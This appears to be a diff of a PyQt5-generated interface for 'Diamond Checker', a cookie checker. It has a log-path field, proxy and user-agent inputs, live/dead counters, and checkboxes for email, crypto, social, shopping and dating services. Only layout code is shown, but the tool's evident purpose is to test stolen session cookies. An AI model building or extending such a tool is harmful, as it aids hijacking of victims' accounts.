self.inbox_checkbox_gridlayout.addWidget(self.cpanel_checkbox, 3, 0, 1, 1) - self.office_checkbox = QtWidgets.QCheckBox(self.widget) - self.office_checkbox.setEnabled(False) - self.office_checkbox.setObjectName("office_checkbox") - self.inbox_checkbox_gridlayout.addWidget(self.office_checkbox, 3, 1, 1, 1) - self.inbox_tab_widget.addTab(self.inbox_tab, "") - self.ads_tab = QtWidgets.QWidget() - self.ads_tab.setObjectName("ads_tab") - self.widget1 = QtWidgets.QWidget(self.ads_tab) - self.widget1.setGeometry(QtCore.QRect(10, 10, 761, 211)) - self.widget1.setObjectName("widget1") - self.gridLayout_3 = QtWidgets.QGridLayout(self.widget1) - self.gridLayout_3.setContentsMargins(0, 0, 0, 0) - self.gridLayout_3.setObjectName("gridLayout_3") - self.bing_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.bing_ads_checkbox.setEnabled(False) - self.bing_ads_checkbox.setObjectName("bing_ads_checkbox") - self.gridLayout_3.addWidget(self.bing_ads_checkbox, 0, 0, 1, 1) - self.reddit_ads__checkbox = QtWidgets.QCheckBox(self.widget1) - self.reddit_ads__checkbox.setEnabled(False) - self.reddit_ads__checkbox.setObjectName("reddit_ads__checkbox") - self.gridLayout_3.addWidget(self.reddit_ads__checkbox, 0, 1, 1, 1) - self.ahref_checkbox = QtWidgets.QCheckBox(self.widget1) - self.ahref_checkbox.setEnabled(False) - self.ahref_checkbox.setObjectName("ahref_checkbox") - self.gridLayout_3.addWidget(self.ahref_checkbox, 0, 2, 1, 1) - self.snapchat_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.snapchat_ads_checkbox.setEnabled(False) - self.snapchat_ads_checkbox.setObjectName("snapchat_ads_checkbox") - self.gridLayout_3.addWidget(self.snapchat_ads_checkbox, 1, 0, 1, 1) - self.tinder_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.tinder_ads_checkbox.setEnabled(False) - self.tinder_ads_checkbox.setObjectName("tinder_ads_checkbox") - self.gridLayout_3.addWidget(self.tinder_ads_checkbox, 1, 1, 1, 1) - self.twitter_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.twitter_ads_checkbox.setEnabled(False) - self.twitter_ads_checkbox.setObjectName("twitter_ads_checkbox") - self.gridLayout_3.addWidget(self.twitter_ads_checkbox, 1, 2, 1, 1) - self.sem_rush_checkbox = QtWidgets.QCheckBox(self.widget1) - self.sem_rush_checkbox.setEnabled(False) - self.sem_rush_checkbox.setObjectName("sem_rush_checkbox") - self.gridLayout_3.addWidget(self.sem_rush_checkbox, 2, 0, 1, 1) - self.craigslist_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.craigslist_ads_checkbox.setEnabled(False) - self.craigslist_ads_checkbox.setObjectName("craigslist_ads_checkbox") - self.gridLayout_3.addWidget(self.craigslist_ads_checkbox, 3, 0, 1, 1) - self.facebookads__checkbox = QtWidgets.QCheckBox(self.widget1) - self.facebookads__checkbox.setObjectName("facebookads__checkbox") - self.gridLayout_3.addWidget(self.facebookads__checkbox, 3, 1, 1, 1) - self.microsoft_ads_checkbox = QtWidgets.QCheckBox(self.widget1) - self.microsoft_ads_checkbox.setEnabled(False) - self.microsoft_ads_checkbox.setObjectName("microsoft_ads_checkbox") - self.gridLayout_3.addWidget(self.microsoft_ads_checkbox, 2, 2, 1, 1) - self.inbox_tab_widget.addTab(self.ads_tab, "") - self.game_tab = QtWidgets.QWidget() - self.game_tab.setObjectName("game_tab") - self.widget2 = QtWidgets.QWidget(self.game_tab) - self.widget2.setGeometry(QtCore.QRect(10, 10, 761, 201)) - self.widget2.setObjectName("widget2") - self.game_checkbox_gridlayout = QtWidgets.QGridLayout(self.widget2) - self.game_checkbox_gridlayout.setContentsMargins(0, 0, 0, 0) - self.game_checkbox_gridlayout.setObjectName("game_checkbox_gridlayout") - self.checkBox_steam = QtWidgets.QCheckBox(self.widget2) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_steam.setFont(font) - self.checkBox_steam.setStyleSheet("") - self.checkBox_steam.setObjectName("checkBox_steam") - self.game_checkbox_gridlayout.addWidget(self.checkBox_steam, 0, 0, 1, 1) - self.checkBox_pathofexile = QtWidgets.QCheckBox(self.widget2) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_pathofexile.setFont(font) - self.checkBox_pathofexile.setStyleSheet("") - self.checkBox_pathofexile.setObjectName("checkBox_pathofexile") - self.game_checkbox_gridlayout.addWidget(self.checkBox_pathofexile, 0, 1, 1, 1) - self.checkBox_roblox = QtWidgets.QCheckBox(self.widget2) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_roblox.setFont(font) - self.checkBox_roblox.setStyleSheet("") - self.checkBox_roblox.setObjectName("checkBox_roblox") - self.game_checkbox_gridlayout.addWidget(self.checkBox_roblox, 1, 0, 1, 1) - self.checkBox_battlenet = QtWidgets.QCheckBox(self.widget2) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_battlenet.setFont(font) - self.checkBox_battlenet.setStyleSheet("") - self.checkBox_battlenet.setObjectName("checkBox_battlenet") - self.game_checkbox_gridlayout.addWidget(self.checkBox_battlenet, 2, 0, 1, 1) - self.inbox_tab_widget.addTab(self.game_tab, "") - self.social_network_tab = QtWidgets.QWidget() - self.social_network_tab.setObjectName("social_network_tab") - self.layoutWidget = QtWidgets.QWidget(self.social_network_tab) - self.layoutWidget.setGeometry(QtCore.QRect(10, 10, 761, 231)) - self.layoutWidget.setObjectName("layoutWidget") - self.gridLayout = QtWidgets.QGridLayout(self.layoutWidget) - self.gridLayout.setContentsMargins(0, 0, 0, 0) - self.gridLayout.setObjectName("gridLayout") - self.checkBox_instagram = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_instagram.setFont(font) - self.checkBox_instagram.setStyleSheet("") - self.checkBox_instagram.setObjectName("checkBox_instagram") - self.gridLayout.addWidget(self.checkBox_instagram, 0, 0, 1, 1) - self.myspace_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.myspace_checkbox.setEnabled(False) - font = QtGui.QFont() - font.setFamily("Arial") - self.myspace_checkbox.setFont(font) - self.myspace_checkbox.setObjectName("myspace_checkbox") - self.gridLayout.addWidget(self.myspace_checkbox, 2, 2, 1, 1) - self.reddit_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.reddit_checkbox.setEnabled(False) - self.reddit_checkbox.setObjectName("reddit_checkbox") - self.gridLayout.addWidget(self.reddit_checkbox, 1, 2, 1, 1) - self.checkBox_discord = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_discord.setFont(font) - self.checkBox_discord.setStyleSheet("") - self.checkBox_discord.setObjectName("checkBox_discord") - self.gridLayout.addWidget(self.checkBox_discord, 2, 1, 1, 1) - self.kick_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.kick_checkbox.setObjectName("kick_checkbox") - self.gridLayout.addWidget(self.kick_checkbox, 5, 0, 1, 1) - self.checkBox_facebook_ads = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_facebook_ads.setFont(font) - self.checkBox_facebook_ads.setStyleSheet("") - self.checkBox_facebook_ads.setObjectName("checkBox_facebook_ads") - self.gridLayout.addWidget(self.checkBox_facebook_ads, 0, 2, 1, 1) - self.checkBox_tiktok = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_tiktok.setFont(font) - self.checkBox_tiktok.setStyleSheet("") - self.checkBox_tiktok.setObjectName("checkBox_tiktok") - self.gridLayout.addWidget(self.checkBox_tiktok, 2, 0, 1, 1) - self.pintrest_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.pintrest_checkbox.setEnabled(False) - self.pintrest_checkbox.setObjectName("pintrest_checkbox") - self.gridLayout.addWidget(self.pintrest_checkbox, 1, 0, 1, 1) - self.checkBox_youtube = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_youtube.setFont(font) - self.checkBox_youtube.setStyleSheet("") - self.checkBox_youtube.setObjectName("checkBox_youtube") - self.gridLayout.addWidget(self.checkBox_youtube, 0, 1, 1, 1) - self.vimeo_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.vimeo_checkbox.setObjectName("vimeo_checkbox") - self.gridLayout.addWidget(self.vimeo_checkbox, 5, 1, 1, 1) - self.rumble_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.rumble_checkbox.setEnabled(False) - self.rumble_checkbox.setObjectName("rumble_checkbox") - self.gridLayout.addWidget(self.rumble_checkbox, 5, 2, 1, 1) - self.localsapp_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.localsapp_checkbox.setEnabled(False) - self.localsapp_checkbox.setObjectName("localsapp_checkbox") - self.gridLayout.addWidget(self.localsapp_checkbox, 5, 3, 1, 1) - self.snapchat_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.snapchat_checkbox.setEnabled(False) - self.snapchat_checkbox.setObjectName("snapchat_checkbox") - self.gridLayout.addWidget(self.snapchat_checkbox, 1, 3, 1, 1) - self.patreon_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.patreon_checkbox.setEnabled(False) - self.patreon_checkbox.setObjectName("patreon_checkbox") - self.gridLayout.addWidget(self.patreon_checkbox, 5, 4, 1, 1) - self.checkBox_netflix = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_netflix.setFont(font) - self.checkBox_netflix.setStyleSheet("") - self.checkBox_netflix.setObjectName("checkBox_netflix") - self.gridLayout.addWidget(self.checkBox_netflix, 1, 1, 1, 1) - self.checkBox_vk = QtWidgets.QCheckBox(self.layoutWidget) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_vk.setFont(font) - self.checkBox_vk.setStyleSheet("") - self.checkBox_vk.setObjectName("checkBox_vk") - self.gridLayout.addWidget(self.checkBox_vk, 1, 4, 1, 1) - self.twitch_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.twitch_checkbox.setEnabled(False) - self.twitch_checkbox.setObjectName("twitch_checkbox") - self.gridLayout.addWidget(self.twitch_checkbox, 0, 3, 1, 1) - self.linkedin_checkbox = QtWidgets.QCheckBox(self.layoutWidget) - self.linkedin_checkbox.setEnabled(False) - self.linkedin_checkbox.setObjectName("linkedin_checkbox") - self.gridLayout.addWidget(self.linkedin_checkbox, 2, 3, 1, 1) - self.inbox_tab_widget.addTab(self.social_network_tab, "") - self.crypto_wallets_tab = QtWidgets.QWidget() - self.crypto_wallets_tab.setObjectName("crypto_wallets_tab") - self.widget3 = QtWidgets.QWidget(self.crypto_wallets_tab) - self.widget3.setGeometry(QtCore.QRect(10, 10, 761, 221)) - self.widget3.setObjectName("widget3") - self.gridLayout_6 = QtWidgets.QGridLayout(self.widget3) - self.gridLayout_6.setContentsMargins(0, 0, 0, 0) - self.gridLayout_6.setObjectName("gridLayout_6") - self.checkBox_coinbase = QtWidgets.QCheckBox(self.widget3) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_coinbase.setFont(font) - self.checkBox_coinbase.setStyleSheet("") - self.checkBox_coinbase.setObjectName("checkBox_coinbase") - self.gridLayout_6.addWidget(self.checkBox_coinbase, 0, 0, 1, 1) - self.checkBox_kryptex = QtWidgets.QCheckBox(self.widget3) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_kryptex.setFont(font) - self.checkBox_kryptex.setStyleSheet("") - self.checkBox_kryptex.setObjectName("checkBox_kryptex") - self.gridLayout_6.addWidget(self.checkBox_kryptex, 0, 1, 1, 1) - self.checkBox_hitbtc = QtWidgets.QCheckBox(self.widget3) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_hitbtc.setFont(font) - self.checkBox_hitbtc.setStyleSheet("") - self.checkBox_hitbtc.setObjectName("checkBox_hitbtc") - self.gridLayout_6.addWidget(self.checkBox_hitbtc, 1, 0, 1, 1) - self.checkBox_freebitcoin = QtWidgets.QCheckBox(self.widget3) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_freebitcoin.setFont(font) - self.checkBox_freebitcoin.setStyleSheet("") - self.checkBox_freebitcoin.setObjectName("checkBox_freebitcoin") - self.gridLayout_6.addWidget(self.checkBox_freebitcoin, 2, 0, 1, 1) - self.inbox_tab_widget.addTab(self.crypto_wallets_tab, "") - self.shopping_tab = QtWidgets.QWidget() - self.shopping_tab.setObjectName("shopping_tab") - self.layoutWidget1 = QtWidgets.QWidget(self.shopping_tab) - self.layoutWidget1.setGeometry(QtCore.QRect(10, 10, 731, 211)) - self.layoutWidget1.setObjectName("layoutWidget1") - self.gridLayout_2 = QtWidgets.QGridLayout(self.layoutWidget1) - self.gridLayout_2.setContentsMargins(0, 0, 0, 0) - self.gridLayout_2.setObjectName("gridLayout_2") - self.checkBox_amazon = QtWidgets.QCheckBox(self.layoutWidget1) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_amazon.setFont(font) - self.checkBox_amazon.setStyleSheet("") - self.checkBox_amazon.setObjectName("checkBox_amazon") - self.gridLayout_2.addWidget(self.checkBox_amazon, 0, 0, 1, 1) - self.ebay_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.ebay_checkbox.setEnabled(False) - self.ebay_checkbox.setObjectName("ebay_checkbox") - self.gridLayout_2.addWidget(self.ebay_checkbox, 0, 1, 1, 1) - self.airbnb_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.airbnb_checkbox.setEnabled(False) - self.airbnb_checkbox.setObjectName("airbnb_checkbox") - self.gridLayout_2.addWidget(self.airbnb_checkbox, 0, 2, 1, 1) - self.envato_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.envato_checkbox.setEnabled(False) - self.envato_checkbox.setObjectName("envato_checkbox") - self.gridLayout_2.addWidget(self.envato_checkbox, 0, 3, 1, 1) - self.flipkart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.flipkart_checkbox.setEnabled(False) - self.flipkart_checkbox.setObjectName("flipkart_checkbox") - self.gridLayout_2.addWidget(self.flipkart_checkbox, 0, 4, 1, 1) - self.checkBox_funpay = QtWidgets.QCheckBox(self.layoutWidget1) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_funpay.setFont(font) - self.checkBox_funpay.setStyleSheet("") - self.checkBox_funpay.setObjectName("checkBox_funpay") - self.gridLayout_2.addWidget(self.checkBox_funpay, 1, 0, 1, 1) - self.kleinanzeigen_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.kleinanzeigen_checkbox.setEnabled(False) - self.kleinanzeigen_checkbox.setObjectName("kleinanzeigen_checkbox") - self.gridLayout_2.addWidget(self.kleinanzeigen_checkbox, 1, 1, 1, 1) - self.booking_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.booking_checkbox.setEnabled(False) - self.booking_checkbox.setObjectName("booking_checkbox") - self.gridLayout_2.addWidget(self.booking_checkbox, 1, 2, 1, 1) - self.uber_eats_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.uber_eats_checkbox.setEnabled(False) - self.uber_eats_checkbox.setObjectName("uber_eats_checkbox") - self.gridLayout_2.addWidget(self.uber_eats_checkbox, 1, 3, 1, 1) - self.dh_gate_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.dh_gate_checkbox.setEnabled(False) - self.dh_gate_checkbox.setObjectName("dh_gate_checkbox") - self.gridLayout_2.addWidget(self.dh_gate_checkbox, 1, 4, 1, 1) - self.checkBox_humble = QtWidgets.QCheckBox(self.layoutWidget1) - font = QtGui.QFont() - font.setFamily("Furore") - self.checkBox_humble.setFont(font) - self.checkBox_humble.setStyleSheet("") - self.checkBox_humble.setObjectName("checkBox_humble") - self.gridLayout_2.addWidget(self.checkBox_humble, 2, 0, 1, 1) - self.temu_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.temu_checkbox.setEnabled(False) - self.temu_checkbox.setObjectName("temu_checkbox") - self.gridLayout_2.addWidget(self.temu_checkbox, 2, 1, 1, 1) - self.fiverr_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.fiverr_checkbox.setEnabled(False) - self.fiverr_checkbox.setObjectName("fiverr_checkbox") - self.gridLayout_2.addWidget(self.fiverr_checkbox, 2, 2, 1, 1) - self.zillow_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.zillow_checkbox.setEnabled(False) - self.zillow_checkbox.setObjectName("zillow_checkbox") - self.gridLayout_2.addWidget(self.zillow_checkbox, 2, 3, 1, 1) - self.instacart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.instacart_checkbox.setEnabled(False) - self.instacart_checkbox.setObjectName("instacart_checkbox") - self.gridLayout_2.addWidget(self.instacart_checkbox, 2, 4, 1, 1) - self.google_play_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.google_play_checkbox.setObjectName("google_play_checkbox") - self.gridLayout_2.addWidget(self.google_play_checkbox, 3, 0, 1, 1) - self.vinted_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.vinted_checkbox.setEnabled(False) - self.vinted_checkbox.setObjectName("vinted_checkbox") - self.gridLayout_2.addWidget(self.vinted_checkbox, 3, 1, 1, 1) - self.walmart_checkbox = QtWidgets.QCheckBox(self.layoutWidget1) - self.walmart_checkbox.setEnabled(False) - self.walmart_checkbox.setObjectName("walmart_checkbox") - self.gridLayout_2.addWidget(self.walmart_checkbox, 3, 2, 1, 1) - self.inbox_tab_widget.addTab(self.shopping_tab, "") - self.daiting_tab = QtWidgets.QWidget() - self.daiting_tab.setObjectName("daiting_tab") - self.widget4 = QtWidgets.QWidget(self.daiting_tab) - self.widget4.setGeometry(QtCore.QRect(20, 0, 751, 221)) - self.widget4.setObjectName("widget4") - self.gridLayout_5 = QtWidgets.QGridLayout(self.widget4) - self.gridLayout_5.setContentsMargins(0, 0, 0, 0) - self.gridLayout_5.setObjectName("gridLayout_5") - self.ashley_madison_checkbox = QtWidgets.QCheckBox(self.widget4) - self.ashley_madison_checkbox.setEnabled(False) - self.ashley_madison_checkbox.setObjectName("ashley_madison_checkbox") - self.gridLayout_5.addWidget(self.ashley_madison_checkbox, 0, 0, 1, 1) - self.zoosk_checkbox = QtWidgets.QCheckBox(self.widget4) - self.zoosk_checkbox.setEnabled(False) - self.zoosk_checkbox.setObjectName("zoosk_checkbox") - self.gridLayout_5.addWidget(self.zoosk_checkbox, 0, 1, 1, 1) - self.meetme_checkbox = QtWidgets.QCheckBox(self.widget4) - self.meetme_checkbox.setEnabled(False) - self.meetme_checkbox.setObjectName("meetme_checkbox") - self.gridLayout_5.addWidget(self.meetme_checkbox, 0, 2, 1, 1) - self.eharmony_checkbox = QtWidgets.QCheckBox(self.widget4) - self.eharmony_checkbox.setEnabled(False) - self.eharmony_checkbox.setObjectName("eharmony_checkbox") - self.gridLayout_5.addWidget(self.eharmony_checkbox, 1, 0, 1, 1) - self.tinder_checkbox = QtWidgets.QCheckBox(self.widget4) - self.tinder_checkbox.setEnabled(False) - self.tinder_checkbox.setObjectName("tinder_checkbox") - self.gridLayout_5.addWidget(self.tinder_checkbox, 1, 1, 1, 1) - self.christan_mingle_checkbox = QtWidgets.QCheckBox(self.widget4) - self.christan_mingle_checkbox.setEnabled(False) - self.christan_mingle_checkbox.setObjectName("christan_mingle_checkbox") - self.gridLayout_5.addWidget(self.christan_mingle_checkbox, 1, 2, 1, 1) - self.inbox_tab_widget.addTab(self.daiting_tab, "") - self.number_of_label = QtWidgets.QLabel(self.centralwidget) - self.number_of_label.setGeometry(QtCore.QRect(540, 280, 71, 31)) - self.number_of_label.setObjectName("number_of_label") - self.files_label = QtWidgets.QLabel(self.centralwidget) - self.files_label.setGeometry(QtCore.QRect(540, 310, 71, 31)) - self.files_label.setObjectName("files_label") - self.folders_label = QtWidgets.QLabel(self.centralwidget) - self.folders_label.setGeometry(QtCore.QRect(540, 340, 71, 31)) - self.folders_label.setObjectName("folders_label") - self.cookies_label = QtWidgets.QLabel(self.centralwidget) - self.cookies_label.setGeometry(QtCore.QRect(540, 380, 71, 21)) - self.cookies_label.setObjectName("cookies_label") - self.cookie_stats_label = QtWidgets.QLabel(self.centralwidget) - self.cookie_stats_label.setGeometry(QtCore.QRect(700, 290, 81, 21)) - self.cookie_stats_label.setObjectName("cookie_stats_label") - self.live_label = QtWidgets.QLabel(self.centralwidget) - self.live_label.setGeometry(QtCore.QRect(700, 320, 71, 21)) - self.live_label.setObjectName("live_label") - self.dead_label = QtWidgets.QLabel(self.centralwidget) - self.dead_label.setGeometry(QtCore.QRect(700, 350, 71, 21)) - self.dead_label.setObjectName("dead_label") - self.errors_label = QtWidgets.QLabel(self.centralwidget) - self.errors_label.setGeometry(QtCore.QRect(700, 380, 71, 21)) - self.errors_label.setObjectName("errors_label") - self.stats_box.raise_() - self.lineEdit_dir.raise_() - self.lineEdit_proxy.raise_() - self.lineEdit_ua.raise_() - self.checkBox_ua.raise_() - self.label_2.raise_() - self.pushButton.raise_() - self.progressBar.raise_() - self.pushButton_dir_logs.raise_() - self.pushButton_proxies_files.raise_() - self.pushButton_useragents_file.raise_() - self.textEdit_console.raise_() - self.social_network_label.raise_() - self.spinBox_thr.raise_() - self.label_lgbt.raise_() - self.comboBox_proxy.raise_() - self.inbox_tab_widget.raise_() - self.number_of_label.raise_() - self.files_label.raise_() - self.folders_label.raise_() - self.cookies_label.raise_() - self.cookie_stats_label.raise_() - self.live_label.raise_() - self.dead_label.raise_() - self.errors_label.raise_() - MainWindow.setCentralWidget(self.centralwidget) - self.statusbar = QtWidgets.QStatusBar(MainWindow) - self.statusbar.setObjectName("statusbar") - MainWindow.setStatusBar(self.statusbar) - - self.retranslateUi(MainWindow) - self.inbox_tab_widget.setCurrentIndex(0) - self.pushButton_proxies_files.clicked.connect(MainWindow.proxies_file) # type: ignore - self.pushButton_dir_logs.clicked.connect(MainWindow.dir_logs) # type: ignore - self.pushButton_useragents_file.clicked.connect(MainWindow.useragents_file) # type: ignore - QtCore.QMetaObject.connectSlotsByName(MainWindow) - - def retranslateUi(self, MainWindow): - _translate = QtCore.QCoreApplication.translate - MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow")) - self.lineEdit_dir.setText(_translate("MainWindow", "The path to the logs")) - self.lineEdit_proxy.setText(_translate("MainWindow", "The path to the proxy")) - self.lineEdit_ua.setText(_translate("MainWindow", "The path to user agents")) - self.checkBox_ua.setText(_translate("MainWindow", "Enable")) - self.pushButton.setText(_translate("MainWindow", "Start")) - self.pushButton_dir_logs.setText(_translate("MainWindow", "Choose a path")) - self.pushButton_proxies_files.setText(_translate("MainWindow", "Choose a path")) - self.pushButton_useragents_file.setText(_translate("MainWindow", "Choose a path")) - self.textEdit_console.setHtml(_translate("MainWindow", "\n" -"\n" -"


")) - self.textEdit_console.setPlaceholderText(_translate("MainWindow", "Diamond Checker - A Cookie Checker Brought To You By DiamondSorter - An Opensourced.Pro Project")) - self.social_network_label.setText(_translate("MainWindow", "Threads")) - self.comboBox_proxy.setItemText(0, _translate("MainWindow", "off")) - self.comboBox_proxy.setItemText(1, _translate("MainWindow", "socks4")) - self.comboBox_proxy.setItemText(2, _translate("MainWindow", "socks5")) - self.comboBox_proxy.setItemText(3, _translate("MainWindow", "http")) - self.gmail_inbox_checkbox.setText(_translate("MainWindow", "Gmail")) - self.yandex_checkbox.setText(_translate("MainWindow", "Yandex")) - self.yahoo_checkbox.setText(_translate("MainWindow", "Yahoo")) - self.outlook_checkbox.setText(_translate("MainWindow", "Outlook")) - self.webmail_checkbox.setText(_translate("MainWindow", "Webmail")) - self.mailru_checkbox.setText(_translate("MainWindow", "Mail.Ru")) - self.cpanel_checkbox.setText(_translate("MainWindow", "Cpanel")) - self.office_checkbox.setText(_translate("MainWindow", "Office")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.inbox_tab), _translate("MainWindow", "Inbox")) - self.bing_ads_checkbox.setText(_translate("MainWindow", "Bing Ads")) - self.reddit_ads__checkbox.setText(_translate("MainWindow", "Reddit Ads")) - self.ahref_checkbox.setText(_translate("MainWindow", "AHref SEO")) - self.snapchat_ads_checkbox.setText(_translate("MainWindow", "Snapchat Ads")) - self.tinder_ads_checkbox.setText(_translate("MainWindow", "Tinder Ads")) - self.twitter_ads_checkbox.setText(_translate("MainWindow", "Twitter Ads")) - self.sem_rush_checkbox.setText(_translate("MainWindow", "SEM Rush")) - self.craigslist_ads_checkbox.setText(_translate("MainWindow", "Craigslist Ads")) - self.facebookads__checkbox.setText(_translate("MainWindow", "Facebook Ads")) - self.microsoft_ads_checkbox.setText(_translate("MainWindow", "Microsoft Ads")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.ads_tab), _translate("MainWindow", "Ads")) - self.checkBox_steam.setText(_translate("MainWindow", "Steam")) - self.checkBox_pathofexile.setText(_translate("MainWindow", "PathofExile")) - self.checkBox_roblox.setText(_translate("MainWindow", "Roblox")) - self.checkBox_battlenet.setText(_translate("MainWindow", "BattleNet")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.game_tab), _translate("MainWindow", "Games")) - self.checkBox_instagram.setText(_translate("MainWindow", "Instagram")) - self.myspace_checkbox.setText(_translate("MainWindow", "Myspace")) - self.reddit_checkbox.setText(_translate("MainWindow", "Reddit")) - self.checkBox_discord.setText(_translate("MainWindow", "Discord")) - self.kick_checkbox.setText(_translate("MainWindow", "Kick")) - self.checkBox_facebook_ads.setText(_translate("MainWindow", "Facebook")) - self.checkBox_tiktok.setText(_translate("MainWindow", "TikTok")) - self.pintrest_checkbox.setText(_translate("MainWindow", "Pintrest")) - self.checkBox_youtube.setText(_translate("MainWindow", "YouTube")) - self.vimeo_checkbox.setText(_translate("MainWindow", "Vimeo")) - self.rumble_checkbox.setText(_translate("MainWindow", "Rumble")) - self.localsapp_checkbox.setText(_translate("MainWindow", "Locals")) - self.snapchat_checkbox.setText(_translate("MainWindow", "Snapchat")) - self.patreon_checkbox.setText(_translate("MainWindow", "Patreon")) - self.checkBox_netflix.setText(_translate("MainWindow", "Netflix")) - self.checkBox_vk.setText(_translate("MainWindow", "VK")) - self.twitch_checkbox.setText(_translate("MainWindow", "Twitch")) - self.linkedin_checkbox.setText(_translate("MainWindow", "LinkedIn")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.social_network_tab), _translate("MainWindow", "Social network")) - self.checkBox_coinbase.setText(_translate("MainWindow", "CoinBase")) - self.checkBox_kryptex.setText(_translate("MainWindow", "Kryptex")) - self.checkBox_hitbtc.setText(_translate("MainWindow", "HitBTC")) - self.checkBox_freebitcoin.setText(_translate("MainWindow", "FreeBitcoin")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.crypto_wallets_tab), _translate("MainWindow", "Crypto wallet")) - self.checkBox_amazon.setText(_translate("MainWindow", "Amazon")) - self.ebay_checkbox.setText(_translate("MainWindow", "Ebay")) - self.airbnb_checkbox.setText(_translate("MainWindow", "AirBNB")) - self.envato_checkbox.setText(_translate("MainWindow", "Envato Elements")) - self.flipkart_checkbox.setText(_translate("MainWindow", "Flipkart")) - self.checkBox_funpay.setText(_translate("MainWindow", "FunPay")) - self.kleinanzeigen_checkbox.setText(_translate("MainWindow", "Kleinanzeigen")) - self.booking_checkbox.setText(_translate("MainWindow", "Booking.com")) - self.uber_eats_checkbox.setText(_translate("MainWindow", "Uber Eats")) - self.dh_gate_checkbox.setText(_translate("MainWindow", "DH Gate")) - self.checkBox_humble.setText(_translate("MainWindow", "Humble")) - self.temu_checkbox.setText(_translate("MainWindow", "Temu")) - self.fiverr_checkbox.setText(_translate("MainWindow", "Fiverr")) - self.zillow_checkbox.setText(_translate("MainWindow", "Zillow")) - self.instacart_checkbox.setText(_translate("MainWindow", "Instacart")) - self.google_play_checkbox.setText(_translate("MainWindow", "Google Play")) - self.vinted_checkbox.setText(_translate("MainWindow", "Vinted")) - self.walmart_checkbox.setText(_translate("MainWindow", "Walmart")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.shopping_tab), _translate("MainWindow", "Shop")) - self.ashley_madison_checkbox.setText(_translate("MainWindow", "AshleyMaddison")) - self.zoosk_checkbox.setText(_translate("MainWindow", "Zoosk")) - self.meetme_checkbox.setText(_translate("MainWindow", "MeetMe")) - self.eharmony_checkbox.setText(_translate("MainWindow", "EHarmony")) - self.tinder_checkbox.setText(_translate("MainWindow", "Tinder")) - self.christan_mingle_checkbox.setText(_translate("MainWindow", "ChristanMingle")) - self.inbox_tab_widget.setTabText(self.inbox_tab_widget.indexOf(self.daiting_tab), _translate("MainWindow", "Daiting")) - self.number_of_label.setText(_translate("MainWindow", "Number of:")) - self.files_label.setText(_translate("MainWindow", "Files:")) - self.folders_label.setText(_translate("MainWindow", "Folders:")) - self.cookies_label.setText(_translate("MainWindow", "Cookies:")) - self.cookie_stats_label.setText(_translate("MainWindow", "Cookie Stats:")) - self.live_label.setText(_translate("MainWindow", "Live:")) - self.dead_label.setText(_translate("MainWindow", "Dead:")) - self.errors_label.setText(_translate("MainWindow", "Errors:")) - - -if __name__ == "__main__": - import sys - app = QtWidgets.QApplication(sys.argv) - MainWindow = QtWidgets.QMainWindow() - ui = Ui_MainWindow() - ui.setupUi(MainWindow) - MainWindow.show() - sys.exit(app.exec_()) +# -*- coding: utf-8 -*- + +# Form implementation generated from reading ui file 'main_ui.ui' +# +# Created by: PyQt5 UI code generator 5.15.9 +# +# WARNING: Any manual changes made to this file will be lost when pyuic5 is +# run again. Do not edit this file unless you know what you 